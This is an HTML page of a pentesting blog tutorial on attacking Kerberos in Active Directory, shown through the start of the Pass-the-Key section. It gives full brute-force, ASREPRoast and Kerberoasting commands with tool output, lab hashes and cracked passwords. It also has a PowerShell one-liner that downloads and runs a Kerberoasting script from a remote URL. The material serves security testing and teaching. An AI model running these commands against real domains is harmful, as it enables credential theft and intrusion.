<!DOCTYPE html> 
<html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">
<link rel="preload" href="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/fonts/Helvetica.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/fonts/BigJohn.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/fonts/Helvetica-Bold.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/fonts/Helvetica-Light.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />
<link rel="alternate" hreflang="es" href="https://www.tarlogic.com/es/blog/como-atacar-kerberos/" />
<link rel="alternate" hreflang="en" href="https://www.tarlogic.com/blog/how-to-attack-kerberos/" />

<title>Kerberos (II): How to attack Kerberos?</title>
<meta name="description" content="In this article about Kerberos, the following attacks against the protocol will be explained: Kerberos brute-force, ASREPRoast, Kerberoasting, Pass the key, Pass the ticket, Silver ticket and Golden ticket." />
<link rel="canonical" href="https://www.tarlogic.com/blog/how-to-attack-kerberos/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Kerberos (II): How to attack Kerberos?" />
<meta property="og:description" content="In this article about Kerberos, the following attacks against the protocol will be explained: Kerberos brute-force, ASREPRoast, Kerberoasting, Pass the key, Pass the ticket, Silver ticket and Golden ticket." />
<meta property="og:url" content="https://www.tarlogic.com/blog/how-to-attack-kerberos/" />
<meta property="og:site_name" content="Tarlogic Security" />
<meta property="article:published_time" content="2019-06-04T09:26:55+00:00" />
<meta property="article:modified_time" content="2021-12-19T23:28:33+00:00" />
<meta property="og:image" content="https://www.tarlogic.com/wp-content/uploads/2019/06/kerberosII.png" />
<meta property="og:image:width" content="371" />
<meta property="og:image:height" content="219" />
<meta name="twitter:label1" content="Written by" />
<meta name="twitter:data1" content="Eloy Pérez" />
<meta name="twitter:label2" content="Est. reading time" />
<meta name="twitter:data2" content="30 minutes" />

<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//maps.googleapis.com' />
<link href='https://fonts.gstatic.com' crossorigin rel='preconnect' />
<link rel="alternate" type="application/rss+xml" title="Tarlogic Security &raquo; Feed" href="https://www.tarlogic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Tarlogic Security &raquo; Comments Feed" href="https://www.tarlogic.com/comments/feed/" />
<link rel="shortcut icon" href="https://www.tarlogic.com/wp-content/uploads/2016/11/FAVICON-01.png" type="image/x-icon" />

<link rel="apple-touch-icon" href="https://www.tarlogic.com/wp-content/uploads/2016/11/FAVICON-01.png">

<link rel="apple-touch-icon" sizes="180x180" href="https://www.tarlogic.com/wp-content/uploads/2016/11/FAVICON-01.png">

<link rel="apple-touch-icon" sizes="152x152" href="https://www.tarlogic.com/wp-content/uploads/2016/11/FAVICON-01.png">

<link rel="apple-touch-icon" sizes="167x167" href="https://www.tarlogic.com/wp-content/uploads/2016/11/FAVICON-01.png">
<link rel="alternate" type="application/rss+xml" title="Tarlogic Security &raquo; Kerberos (II): How to attack Kerberos? Comments Feed" href="https://www.tarlogic.com/blog/how-to-attack-kerberos/feed/" />
<link data-minify="1" rel='stylesheet' id='wpml-legacy-horizontal-list-0-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-list-horizontal/style-e81ae42980c5ddf463df353719e9c512.css' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='tar-main-style-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/css/main-1dc9a8cdbeb8703eadcd4fb5b8b02239.css' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='tar-header-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/css/3_layouts/header-e1e4e75656cadb99a5cfbbe559e987f7.css' type='text/css' media='all' />
<style id='rocket-lazyload-inline-css' type='text/css'>
.rll-youtube-player{position:relative;padding-bottom:56.23%;height:0;overflow:hidden;max-width:100%;}.rll-youtube-player iframe{position:absolute;top:0;left:0;width:100%;height:100%;z-index:100;background:0 0}.rll-youtube-player img{bottom:0;display:block;left:0;margin:auto;max-width:100%;width:100%;position:absolute;right:0;top:0;border:none;height:auto;cursor:pointer;-webkit-transition:.4s all;-moz-transition:.4s all;transition:.4s all}.rll-youtube-player img:hover{-webkit-filter:brightness(75%)}.rll-youtube-player .play{height:72px;width:72px;left:50%;top:50%;margin-left:-36px;margin-top:-36px;position:absolute;background:url(https://www.tarlogic.com/wp-content/plugins/wp-rocket/assets/img/youtube.png) no-repeat;cursor:pointer}
</style>
<script type='text/javascript' id='global_vars-js-extra'>
/* <![CDATA[ */
var global_vars = {"lang":"en"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/js/global_vars.js?ver=5.8.1' id='global_vars-js'></script>
<script data-minify="1" type='text/javascript' src='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/js/load_polyfills-3825dbfb2b3135a27bc49228953ba756.js' id='load_polyfills-js'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.tarlogic.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.tarlogic.com/wp-includes/wlwmanifest.xml" />
<link rel='shortlink' href='https://www.tarlogic.com/?p=19268' />
<style type="text/css" id="css-fb-visibility">@media screen and (max-width: 640px){body:not(.fusion-builder-ui-wireframe) .fusion-no-small-visibility{display:none !important;}body:not(.fusion-builder-ui-wireframe) .sm-text-align-center{text-align:center !important;}body:not(.fusion-builder-ui-wireframe) .sm-text-align-left{text-align:left !important;}body:not(.fusion-builder-ui-wireframe) .sm-text-align-right{text-align:right !important;}body:not(.fusion-builder-ui-wireframe) .fusion-absolute-position-small{position:absolute;top:auto;width:100%;}}@media screen and (min-width: 641px) and (max-width: 1024px){body:not(.fusion-builder-ui-wireframe) .fusion-no-medium-visibility{display:none !important;}body:not(.fusion-builder-ui-wireframe) .md-text-align-center{text-align:center !important;}body:not(.fusion-builder-ui-wireframe) .md-text-align-left{text-align:left !important;}body:not(.fusion-builder-ui-wireframe) .md-text-align-right{text-align:right !important;}body:not(.fusion-builder-ui-wireframe) .fusion-absolute-position-medium{position:absolute;top:auto;width:100%;}}@media screen and (min-width: 1025px){body:not(.fusion-builder-ui-wireframe) .fusion-no-large-visibility{display:none !important;}body:not(.fusion-builder-ui-wireframe) .lg-text-align-center{text-align:center !important;}body:not(.fusion-builder-ui-wireframe) .lg-text-align-left{text-align:left !important;}body:not(.fusion-builder-ui-wireframe) .lg-text-align-right{text-align:right !important;}body:not(.fusion-builder-ui-wireframe) .fusion-absolute-position-large{position:absolute;top:auto;width:100%;}}</style>

<script type="application/ld+json" class="saswp-schema-markup-output">
[

{"@context":"https:\/\/schema.org","@type":"Article","@id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/#Article","url":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/","inLanguage":"en-US","mainEntityOfPage":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/","headline":"Kerberos (II): How to attack Kerberos?","description":"In this article about Kerberos, the following attacks against the protocol will be explained: Kerberos brute-force, ASREPRoast, Kerberoasting, Pass the key, Pass the ticket, Silver ticket and Golden ticket.","articleBody":"      Introduction    In this article about Kerberos, a few attacks against the protocol will be shown. In order to refresh the concepts behind the following attacks, it is recommended to check the first part of this series which covers Kerberos theory.          The post is divided in one section per attack:     \tKerberos brute-force   \tASREPRoast   \tKerberoasting   \tPass the key   \tPass the ticket   \tSilver ticket   \tGolden ticket        These attacks are sorted by the privileges needed to perform them, in ascending order. Thus, to perform the first attacks only connectivity with the DC (Domain Controller) is required, which is the KDC (Key Distribution Center) for the AD (Active Directory) network. Whereas, the last attack requires a user being a Domain Administrator or having similar privileges.          Furthermore, each attack will be introduced from the pentesting perspective of 2 common scenarios:         \tLinux machine: A computer external to the domain, owned by the auditor (Kali in this case), but with network connectivity to the DC (directly, VPN, Socks, does not really matter). It must be taken into account that the local time of the machine has to be synchronized with the DC.   \tWindows machine: A compromised Windows machine in the domain, with a domain account if needed but with no administrator privileges, neither local nor domain.    
It is done this way because there are plenty of publications only covering part of one scenario. Therefore, the goal here is to present a useful guide that shows how to perform any attack in many different circumstances. Anyway, anyone can leave a comment if any concept is not completely explained.              Tools  First of all, throughout this article the following main tools are used:     \tExamples of Impacket, to perform Kerberos-related Linux attacks, which requires Python installed on the machine.   \tMimikatz, for Windows attacks.   \tRubeus, for Windows attacks, which requires Redistributable 3.5 installed on the machine.   \tPsExec, for executing commands from Windows in remote machines.    There are a few additional tools, but those will be introduced in their respective sections. Besides, a Kerberos attacks cheatsheet was created to quickly get the commands needed to perform any of these attacks.    Let's go with the interesting stuff.      Kerberos brute-force  First, since Kerberos is an authentication protocol, it is possible to perform brute-force attacks against it. Moreover, brute-forcing Kerberos has many advantages over brute-forcing other authentication methods, like the following:     \tNo domain account is needed to conduct the attack, just connectivity to the KDC.   \tKerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with a specific Kerberos pre-authentication failure event (4771).   \tKerberos indicates, even if the password is wrong, whether the username is correct or not. This is a huge advantage when performing this sort of technique without knowing any username.   \tIn Kerberos brute-forcing it is also possible to discover user accounts without pre-authentication required, which can be useful to perform an ASREPRoast attack.    However, by carrying out a brute-force attack it is also possible to block user accounts. 
Thus, this technique should be used carefully.    From Linux  The script kerbrute.py can be used to perform a brute-force attack by using Kerberos from a Linux computer:  root@kali:kerbrute# python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation   Valid user &gt; triceratops   Valid user &gt; velociraptor    Valid user &gt; trex   Blocked\/Disabled user &gt; trex   Stupendous &gt; velociraptor:Sm4rtSp33d   Saved TGT in velociraptor.ccache   Saved discovered passwords in jurassic_passwords.txt    Once finished, a file with the discovered passwords is generated. Besides, the obtained TGTs tickets are stored for future use.  From Windows  In the case of Windows, the module brute of Rubeus, which is available on a fork of Zer1t0, can be used to launch a brute-force attack like the following:  PS C:\\Users\\user01&gt; .\\Rubeus.exe brute \/users:users.txt \/passwords:passwords.txt \/domain:jurassic.park \/outfile:jurassic_passwords.txt       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.4.2     Valid user &gt; velociraptor   Valid user &gt; trex   Valid user &gt; triceratops   STUPENDOUS &gt; triceratops:Sh4rpH0rns   Saved TGT into triceratops.kirbi    In the same way as in the Linux scenario, the discovered credentials are saved in the output file alongside valid TGTs.      ASREPRoast  The ASREPRoast attack looks for users without Kerberos pre-authentication required. That means that anyone can send an AS_REQ request to the KDC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline. 
More detail in Kerberos theory.    Furthermore, no domain account is needed to perform this attack, only connection to the KDC. However, with a domain account, an LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.    In order to retrieve user accounts without Kerberos pre-authentication, the following LDAP filter can be used:\u00a0(&amp;(samAccountType805306368)(userAccountControl:1.2.840.113556.1.4.803:4194304)) . Parameter samAccountType\u00a0allows to request user accounts only, without including computer accounts, and\u00a0userAccountControl\u00a0filters by Kerberos pre-authentication in this case.  From Linux  The script GetNPUsers.py can be used from a Linux machine in order to harvest the non-preauth AS_REP responses. The following commands allow to use a given username list or query to obtain a list of users by providing domain credentials:  root@kali:impacket-examples# python GetNPUsers.py jurassic.park\/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     User trex doesn't have UF_DONT_REQUIRE_PREAUTH set   User triceratops doesn't have UF_DONT_REQUIRE_PREAUTH set   Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)  root@kali:impacket-examples# cat hashes.asreproast   $krb5asrep$23$velociraptor@JURASSIC.PARK:7c2e70d3d46b4794b9549bba5c6b728e$599da4e9b7823dbc8432c188c0cf14151df3530601ad57ee0bc2730e0f10d3f1552b3552cee9431cf3f1b119d099d3cead7ea38bc29d5d83074035a2e1d7de5fa17c9925c75aac2717f49baae54958ec289301a1c23ca2ec1c5b5be4a495215d42e9cbb2feb8b7f58fb28151ac6ecb0684c27f14ecc35835aecc3eec1ec3056d831dd518f35103fd970f6d082da0ebaf51775afa8777f783898a1fa2cea7493767024ab3688ec4fe00e3d08a7fb20a32c2abf8bdf66c9c42f49576ae9671400be01b6156b4677be4c79d807ba61f4703d9acda0e66befc5b442660ac638983680ffa3ada7eacabad0841c9aee586    root@kali:impacket-examples# python 
GetNPUsers.py jurassic.park\/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation    Name          MemberOf                                       PasswordLastSet      LastLogon            UAC        ------------  ---------------------------------------------  -------------------  -------------------  --------  velociraptor  CNDomain Admins,CNUsers,DCjurassic,DCpark  2019-02-27 17:12:12  2019-03-18 11:44:04  0x410200         root@kali:impacket-examples# cat hashes.asreproast   $krb5asrep$23$velociraptor@JURASSIC.PARK:6602e01d59b4eeba815ab467194a9de4$b13a0e139b1daa46a457b3fa948c22cbbaad75a94c2b37064d757185d171c258e290210339d950b9245de6fa40a335986146a8c71c0b60f633b4c040141460a0a91737670f21caae6261ebde0151c06adceac22bfed84cb8c1f07948fb8e75b8a1d64c768c9e3f3a50d035ec03df643ea185648406b634b6fd673028e6e90ea429f57f9229b00f47f2bba2cdb7297d29b9f97a83d07c89dee7ea673340f64c443a213d5b9bbed969a68ca7a0ea41245b0fa985f64261803488b61821fbaedf43d50ea16075b2379bb354e4001d73dfd19cc8787b4bcd2bd9b542e0e2b1218ee8c16699c134ae5ec587afe0fd1880    After finishing the execution, the script will generate an output file with encoded AS_REP messages to crack using hashcat or John.  From Windows  Rubeus can be used to carry out this attack from a Windows machine. 
The following command will generate a file containing AS_REP messages of affected users:  C:\\Users\\triceratops&gt;.\\Rubeus.exe asreproast \/format:hashcat \/outfile:hashes.asreproast       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3     Action: AS-REP roasting     Using domain controller: Lab-WDC01.jurassic.park (10.200.220.2)   Building AS-REQ (w\/o preauth) for: 'jurassic.park\\velociraptor'   Connecting to 10.200.220.2:88   Sent 170 bytes   Received 1423 bytes   AS-REQ w\/o preauth successful!   Hash written to C:\\Users\\triceratops\\hashes.asreproast     Roasted hashes written to : C:\\Users\\triceratops\\hashes.asreproast    C:\\Users\\triceratops&gt;type hashes.asreproast  $krb5asrep$23$velociraptor@jurassic.park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nce executed, Rubeus should have generated a file with one AS_REP per line. This file can be used to feed Hashcat or John.  Cracking the AS_REP  Finally, to crack the harvested AS_REP messages, Hashcat or John can be used. In this case a dictionary attack will be performed, but a variety of cracking techniques can be applied.    Hashcat command:  root@kali:impacket-examples# hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt   hashcat (v5.1.0) starting...    OpenCL Platform #1: The pocl project    * Device #1: pthread-Intel(R) Core(TM) i5-4210H CPU @ 2.90GHz, 2961\/2961 MB allocatable, 2MCU    Hashes: 1 digests; 1 unique digests, 1 unique salts  Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5\/13 rotates  Rules: 1    Applicable optimizers:  * Zero-Byte  * Not-Iterated  * Single-Hash  * Single-Salt    Minimum password length supported by kernel: 0  Maximum password length supported by kernel: 256    ATTENTION! Pure (unoptimized) OpenCL kernels selected.  
This enables cracking passwords and salts &gt; length 32 but for the price of drastically reduced performance.  If you want to switch to optimized OpenCL kernels, append -O to your commandline.    Watchdog: Hardware monitoring interface not found on your system.  Watchdog: Temperature abort trigger disabled.    * Device #1: build_opts '-cl-stdCL1.2 -I OpenCL -I \/usr\/share\/hashcat\/OpenCL -D LOCAL_MEM_TYPE2 -D VENDOR_ID64 -D CUDA_ARCH0 -D AMD_ROCM0 -D VECT_SIZE4 -D DEVICE_TYPE2 -D DGST_R00 -D DGST_R11 -D DGST_R22 -D DGST_R33 -D DGST_ELEM4 -D KERN_TYPE18200 -D _unroll'  Dictionary cache hit:  * Filename..: passwords_kerb.txt  * Passwords.: 3  * Bytes.....: 25  * Keyspace..: 3    The wordlist or mask that you are using is too small.  This means that hashcat cannot use the full parallel power of your device(s).  Unless you supply more work, your cracking speed will drop.  For tips on supplying more work, see: https:\/\/hashcat.net\/faq\/morework    Approaching final keyspace - workload adjusted.      
$krb5asrep$23$velociraptor@jurassic.park:bbec05d876e5133f5ab0ceda07572fe0$4a826cd2123ebc266179a9009e867eaac03d1c8c9880acf76dca4b5919f967e86dbb6cd475da8ef5c83b1b8388d22da005ba10d5cb4d10f3c3f44c918acd5843660c4ff5c678e635f7751a109524d693db29bf75a5f0995b41cd35600b969fe371f77ad13f48604dfab87253d324e8f53c267a2299d2450245d317d319a4fd424b42f815b79e2dd16c58ab2a2c106eb6995aff70c8e889d8f170b35e78993157b3b3d13dcce18a720bc5810c474cbc95c07b5ffcee5ee06442fdb6244c33eeca4bfcd4f6c051a5f00c40a837a9644ada70a381a85089f05cfb5e5f03ab0c7525bba6aeaf9da3554d3d700dd54760:Sm4rtSp33d                                                     Session..........: hashcat  Status...........: Cracked  Hash.Type........: Kerberos 5 AS-REP etype 23  Hash.Target......: $krb5asrep$23$velociraptor@jurassic.park:bbec05d876...d54760  Time.Started.....: Tue Mar  5 11:15:47 2019 (1 sec)  Time.Estimated...: Tue Mar  5 11:15:48 2019 (0 secs)  Guess.Base.......: File (passwords_kerb.txt)  Guess.Queue......: 1\/1 (100.00%)  Speed.#1.........:        4 H\/s (0.18ms) @ Accel:64 Loops:1 Thr:64 Vec:4  Recovered........: 1\/1 (100.00%) Digests, 1\/1 (100.00%) Salts  Progress.........: 3\/3 (100.00%)  Rejected.........: 0\/3 (0.00%)  Restore.Point....: 0\/3 (0.00%)  Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1  Candidates.#1....: above1 -&gt; below1    Started: Tue Mar  5 11:12:26 2019  Stopped: Tue Mar  5 11:15:48 2019    John command:  root@kali:kali# john --wordlistpasswords_kerb.txt hashes.asreproast  Using default input encoding: UTF-8  Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17\/18\/23 )  Will run 2 OpenMP threads  Press 'q' or Ctrl-C to abort, almost any other key for status  Warning: Only 1 candidates left, minimum 16 needed for performance.  
Sm4rtSp33d       ($krb5asrep$velociraptor@jurassic.park)  1g 0:00:00:00 DONE (2019-03-07 17:16) 20.00g\/s 20.00p\/s 20.00c\/s 20.00C\/s Sm4rtSp33d  Use the \"--show\" option to display all of the cracked passwords reliably  Session completed    In this case, luck is on our side, and the user password was contained in the dictionary.      Kerberoasting  The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. More detail in Kerberos theory.    Therefore, to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is anyone since no special privileges are required.    In order to retrieve user accounts which have associated services, the following LDAP filter can be used: (&amp;(samAccountType805306368)(servicePrincipalName*)). Parameter samAccountType allows filtering out the computer accounts, and servicePrincipalName* filters by accounts with at least one service.  From Linux  From a Linux machine, it is possible retrieve all the TGS's by using the impacket example GetUserSPNs.py. 
The command required to perform the attack and save the TGS's into a file is the following:  root@kali:impacket-examples# python GetUserSPNs.py jurassic.park\/triceratops:Sh4rpH0rns -outputfile hashes.kerberoast  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation    ServicePrincipalName  Name          MemberOf  PasswordLastSet      LastLogon             --------------------  ------------  --------  -------------------  -------------------  cloner\/labwws02       velociraptor            2019-02-27 17:12:12  2019-03-05 09:35:27         root@kali:impacket-examples# cat hashes.kerberoast   $krb5tgs$23$*velociraptor$JURASSIC.PARK$cloner\/labwws02*$b127187aceb93774a985bb1e528da85c$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    Once finished, a file with a crackable TGS per line should have been generated as output. This file can be used to feed Hashcat or John in order to crack its TGS's.  From Windows  Likewise, Kerberoasting can be performed from a Windows machine with several tools such as Rubeus or Invoke-Kerberoast from Empire project. In this case, tools are launched from the context of a logged user inside a domain workstation. 
The commands are the following:  C:\\Users\\triceratops&gt;.\\Rubeus.exe kerberoast \/outfile:hashes.kerberoast       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3     Action: Kerberoasting     SamAccountName         : velociraptor   DistinguishedName      : CNvelociraptor,OUUsuarios,DCjurassic,DCpark   ServicePrincipalName   : cloner\/labwws02   Hash written to C:\\Users\\triceratops\\hashes.kerberoast     Roasted hashes written to : C:\\Users\\triceratops\\hashes.kerberoast    C:\\Users\\triceratops&gt;type hashes.kerberoast  $krb5tgs$23$*$jurassic.park$cloner\/labwws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nother way to accomplish Kerberoast is to use the powershell script Invoke-Kerberoast from Empire project, which can be loaded directly into memory:  PS C:\\Users\\triceratops&gt; iex (new-object Net.WebClient).DownloadString(\"https:\/\/raw.githubusercontent.com\/EmpireProject\/Empire\/master\/data\/module_source\/credentials\/Invoke-Kerberoast.ps1\")  PS C:\\Users\\triceratops&gt; Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast    In the same way as impacket, these tools create output files with one crackable TGS per line, which can be used to feed Hashcat or John.  Cracking the TGSs  In this section, cracking examples of both Hashcat and John will be shown. However, there are several different cracking methods which can be applied in this situation. Next, a dictionary attack will be performed (the dictionary contains the password for demonstration purposes).    Hashcat command:  root@kali:impacket-examples# hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt   hashcat (v5.1.0) starting...    
OpenCL Platform #1: The pocl project    * Device #1: pthread-Intel(R) Core(TM) i5-4210H CPU @ 2.90GHz, 2961\/2961 MB allocatable, 2MCU    Hashes: 1 digests; 1 unique digests, 1 unique salts  Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5\/13 rotates  Rules: 1    Applicable optimizers:  * Zero-Byte  * Not-Iterated  * Single-Hash  * Single-Salt    Minimum password length supported by kernel: 0  Maximum password length supported by kernel: 256    ATTENTION! Pure (unoptimized) OpenCL kernels selected.  This enables cracking passwords and salts &gt; length 32 but for the price of drastically reduced performance.  If you want to switch to optimized OpenCL kernels, append -O to your commandline.    Watchdog: Hardware monitoring interface not found on your system.  Watchdog: Temperature abort trigger disabled.    * Device #1: build_opts '-cl-stdCL1.2 -I OpenCL -I \/usr\/share\/hashcat\/OpenCL -D LOCAL_MEM_TYPE2 -D VENDOR_ID64 -D CUDA_ARCH0 -D AMD_ROCM0 -D VECT_SIZE4 -D DEVICE_TYPE2 -D DGST_R00 -D DGST_R11 -D DGST_R22 -D DGST_R33 -D DGST_ELEM4 -D KERN_TYPE13100 -D _unroll'  * Device #1: Kernel m13100_a0-pure.43809ab0.kernel not found in cache! Building may take a while...  Dictionary cache hit:  * Filename..: passwords_kerb.txt  * Passwords.: 3  * Bytes.....: 25  * Keyspace..: 3    The wordlist or mask that you are using is too small.  This means that hashcat cannot use the full parallel power of your device(s).  Unless you supply more work, your cracking speed will drop.  For tips on supplying more work, see: https:\/\/hashcat.net\/faq\/morework    Approaching final keyspace - workload adjusted.      
$krb5tgs$23$*velociraptor$jurassic.park$cloner\/labwws02*$60b2e176b7a641fd663bf1b8d0b6e106$069b2aca38b73bfcac56526dbaef743f4981980cd213dd9fe7d41d3ab3f3e521273c70d9ca681319f690c5bfae627b423d3fbad20d7ede8e1af930b5aefcc2657b4a8b0bd5dcd9b51560e78478a9a7616c0cb675fdc501828cce58206542d48d48b4a1dce61bdcb9705094de1d16536526e04e5ae84567407da665868e33db26cd763dcebdd8f6801494a9f6e3ade8f63c7d197d1ae66345a9635fe5e7c2d35a9dc4885dd2c6699ce8c00d71b518dc6ba8b87f525aec635881245f20e7ece150b4d4223c19960aff417fb4c053ea6fa3b86938fca1f1a781e3f36fab9ee8909422cce440453f0e3a2d23ded7861ba919bc8567c6dc1f77817f1e44181783ec3ba76cf688a841fbd6f9b02b2bd2d4a22bb489808f04caaa87d025812ef11b39fec605485eb875d57f4d09623b3108638816e6d2db81f280635b29fd4bd08a9c8aae72571b61e81274c56dcab8ae13c2eefa3af2dd4084a96ca84f336987cd765c2d23fb957ee378136ed42bbfde1de8361bf933b51370d7af07a3a939c3feec62adc4a884ee52a296def9402f732d57f04fb93fc296b8f5031fa852403d6ae7211648693c4cd0c47847c07e869d1fb41b627b1928ec929409eee0b1ce67bb55cea069a26809e8347a3bea34ab9ec4f78051d40ccd9ab1c5af655165f86e0185b72e01643854710e322a2722bdeaaba317a1ecd78096e3d5a51831a57f505b861aeeb9b2207ca2d7fbce47847c3d3a1cb9d5c2b931bc532b220434550d83a82f63b26b918e189c38d7d979ac05d34043ecedca09cefdb3065a8be2717e84fc325373a7b778aa4325d7f0458ac7a84196da7752befe0ed9a0830ecb60ba4f3ec5f0a2fb3ba482dd9f947c8a667ccc54013c01d15e0ab41cc08a140389028461b16e38ccd85542f8b53e1ac4cb4e8f6ce2efc9ecdabd6aed2716c17221791d620e333359b39a0d6720fd6167a2d03a74b4c7fd549ec9169ac3103a4ebd9bf8f5754ef013411802524a5f8da6fe7fbcd219d2193891c9026513aeb751d6d3707253929f43f6a40012e2463002465f888e6f15c4ce264db88650d503431a3d1fc58321adb65f7bc69e2e95562a81ffe3a633bf4ac27b85ce2cb49a0ef19fda1a51074b898d21b94fa91f7092be9b22bdfba09829fc1b95187ae8cb2bbab3c1e3ecf5835723c2858862a0bef32001ac461c0fe496029b3e7e6827e0991f6cf3f6d658f4aa8ddddc097cc2b12038df8112833da052d0ed2d42d2fd93da13ffee3831f57956dff6fa0c9e573862b1d4f2ac3344f7320f1fbcb5f9773eee0f091829052cc5f31cecbd0e468914c70b9f03ca056a53e449ae85734b1c43d57fe
efc5576672c82d47f14a168e9a2ffde715955b2749a01de174cb32c4d8f7477a087e717379d9599e50997d8619d8f1f2db268e5d89a9da13e2b61c15e97159740766c4415b5f46c754a2c2c9500092bd1af88f1c1c4d5dc4a4f5078f691148d448dbcd94549f74a2312921293427891def1c0754fa6aa3633141be8d885703279c62eece474a366fc9b8c8a4a5daf98ff:Sm4rtSp33d                                                     Session..........: hashcat  Status...........: Cracked  Hash.Type........: Kerberos 5 TGS-REP etype 23  Hash.Target......: $krb5tgs$23$*velociraptor$jurassic.park$cloner\/labw...af98ff  Time.Started.....: Tue Mar  5 10:46:34 2019 (1 sec)  Time.Estimated...: Tue Mar  5 10:46:35 2019 (0 secs)  Guess.Base.......: File (passwords_kerb.txt)  Guess.Queue......: 1\/1 (100.00%)  Speed.#1.........:        4 H\/s (0.16ms) @ Accel:64 Loops:1 Thr:64 Vec:4  Recovered........: 1\/1 (100.00%) Digests, 1\/1 (100.00%) Salts  Progress.........: 3\/3 (100.00%)  Rejected.........: 0\/3 (0.00%)  Restore.Point....: 0\/3 (0.00%)  Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1  Candidates.#1....: above1 -&gt; below1    Started: Tue Mar  5 10:42:51 2019  Stopped: Tue Mar  5 10:46:35 2019    While using hashcat, an encoding problem arose: the tool displays an error similar to Byte Order Mark (BOM) was detected when the input file is encoded in Unicode (which is common in Windows output files) instead of ASCII. To solve this issue, the tool dos2unix can be used to convert the file to the correct encoding.    John command:  root@kali:impacket-examples# john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast  Using default input encoding: UTF-8  Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 )  Will run 2 OpenMP threads  Press 'q' or Ctrl-C to abort, almost any other key for status  Sm4rtSp33d       (?)  
1g 0:00:00:00 DONE (2019-03-05 10:53) 50.00g\/s 150.0p\/s 150.0c\/s 150.0C\/s above1..below1  Use the \"--show\" option to display all of the cracked passwords reliably  Session completed    John was not able to show the username alongside the cracked password; instead, it displayed the symbol (?). While this is enough in the case of just one TGS, it can get pretty annoying if several are going to be cracked.    In the end, as shown above, it was possible to crack the password by using the correct dictionary with both tools.      Overpass The Hash\/Pass The Key (PTK)  This attack uses the user's NTLM hash to request Kerberos tickets, as an alternative to the common Pass The Hash over the NTLM protocol. Therefore, it can be especially useful in networks where the NTLM protocol is disabled and only Kerberos is allowed as an authentication protocol.    In order to perform this attack, the NTLM hash (or password) of the target user account is needed. Thus, once a user hash is obtained, a TGT can be requested for that account. 